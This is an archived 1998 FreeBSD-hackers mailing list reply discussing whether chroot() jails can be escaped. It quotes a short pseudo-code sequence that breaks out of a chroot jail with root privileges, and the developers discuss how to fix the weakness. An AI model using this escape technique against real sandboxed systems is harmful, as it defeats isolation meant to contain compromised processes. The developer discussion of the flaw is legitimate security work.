Date: Sat, 21 Nov 1998 19:45:47 -0800 From: Don Lewis <Don.Lewis@tsc.tdk.com> To: Eivind Eklund <eivind@yes.no>, Mike Smith <mike@smith.net.au>, Harold Gutch <logix@foobar.franken.de> Cc: zhihuizhang <bf20761@binghamton.edu>, hackers <freebsd-hackers@FreeBSD.ORG> Subject: Re: Question on chroot() Message-ID: <199811220345.TAA00182@salsa.gv.tsc.tdk.com> In-Reply-To: Eivind Eklund <eivind@yes.no> "Re: Question on chroot()" (Nov 17, 12:54pm)
next in thread | previous in thread | raw e-mail | index | archive | help
On Nov 17, 12:54pm, Eivind Eklund wrote:
} Subject: Re: Question on chroot()
} On Sun, Nov 15, 1998 at 12:56:03PM -0800, Mike Smith wrote:
} > It's quite difficult to break out of a chroot'ed environment, yes, and
} > it's intended to be impossible, so obviously you can only get out
} > through flaws in the implementation...
}
} It is easy if you have root privileges inside the "jail".
}
} /* pseudo-code */
} mkdir("mybreakdir", 0700);
} breakfd = open(".", 0, 0);
} chroot("mybreakdir");
} fchdir(breakfd);
} for (i=0; i<1000; i++)
} chdir("..");
} chroot(".");
}
} I'm not sure if you need the fchdir();
You don't.
} chroot() is not supposed to
} affect your current directory. I don't think anybody has fixed the
} above problem; it seems quite difficult to fix (you have to know which
} FDs are inside and outside the jail, which is non-trivial).
I implemented a local hack to solve the problem, though it has some
limitations. I've thought of a better scheme that I have yet to
implement. When I do, I'll post it for comments.
--- Truck
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-hackers" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199811220345.TAA00182>